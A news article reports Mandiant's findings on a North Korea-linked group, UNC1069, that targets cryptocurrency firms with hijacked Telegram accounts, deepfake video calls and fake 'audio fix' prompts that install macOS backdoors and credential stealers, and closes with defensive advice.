North Korean Hackers Use Deepfakes to Target Crypto Firms
Feb 11, 2026: Cybersecurity researchers have uncovered a sophisticated hacking campaign believed to be linked to North Korea, targeting cryptocurrency and financial technology companies through deepfake video calls and advanced malware.
According to findings released by Google Cloud’s Mandiant Threat Intelligence team, the operation has been attributed to a financially motivated group tracked as UNC1069.
Investigators say the campaign combines social engineering tactics, artificial intelligence-generated deepfakes, and malware specifically designed to infect macOS systems. The apparent objective is to steal cryptocurrency and sensitive account credentials.
Hijacked Accounts Used to Build Trust
In one identified case, attackers gained access to the Telegram account of a cryptocurrency executive whose profile had previously been compromised.
The hijacked account was then used to contact other professionals in the fintech sector, initiating conversations to build credibility and trust.
After establishing communication, the attackers sent meeting invitations that appeared to be legitimate video conferences.
The meeting platform resembled a popular video conferencing service, but researchers say it was actually hosted on infrastructure controlled by the attackers.
One targeted individual reported encountering what appeared to be a live video call featuring a realistic deepfake impersonation of the executive.
While researchers were unable to independently verify the use of deepfake technology in every instance, they noted that AI-driven impersonation tactics are becoming increasingly common in cybercrime.
Malware Deployed Through “Technical Fix” Scam
During the fake meeting, victims were reportedly told they were experiencing audio issues and were guided through steps to “fix” the problem.
This tactic, sometimes referred to as a “ClickFix” attack, tricks users into running commands on their own devices under the pretense of resolving a technical issue.
Once executed, those commands allowed attackers to gain unauthorized access to the victim’s computer. Researchers say multiple backdoor tools were then deployed, enabling remote control and deeper system access.
Additional malware designed to steal information was also installed. These tools were capable of extracting login credentials from macOS Keychain, collecting browser data from Chrome, Brave, and Edge, and retrieving user information from messaging apps and note-taking software.
Security analysts believe the attackers aimed to gather as much data as possible, including passwords, session tokens, and authentication details, which could later be used for cryptocurrency theft or further social engineering attacks.
Broader Pattern of Crypto-Related Attacks
Cybersecurity experts warn that state-linked North Korean hacking groups have a long history of targeting cryptocurrency platforms and digital asset firms. Over the past several years, such groups have been associated with large-scale digital asset thefts worldwide.
Recent estimates suggest that North Korean-linked cyber operations accounted for a significant share of cryptocurrency stolen globally in 2025, with losses reaching billions of dollars. Analysts say digital assets remain attractive targets due to their speed of transfer and relative difficulty of recovery once stolen.
Growing Threat of AI-Enhanced Cybercrime
The campaign highlights the increasing role of artificial intelligence in cyberattacks. Deepfake technology and AI-assisted impersonation tools are making fraudulent communications more convincing and harder to detect.
Security professionals recommend that companies verify meeting invitations through secondary channels, implement multi-factor authentication, and train employees to recognize suspicious technical support requests. Experts also advise organizations to limit administrative privileges and closely monitor unusual system activity.
As cybercriminal tactics evolve, researchers say heightened vigilance and stronger cybersecurity practices are essential to protect financial and digital assets.
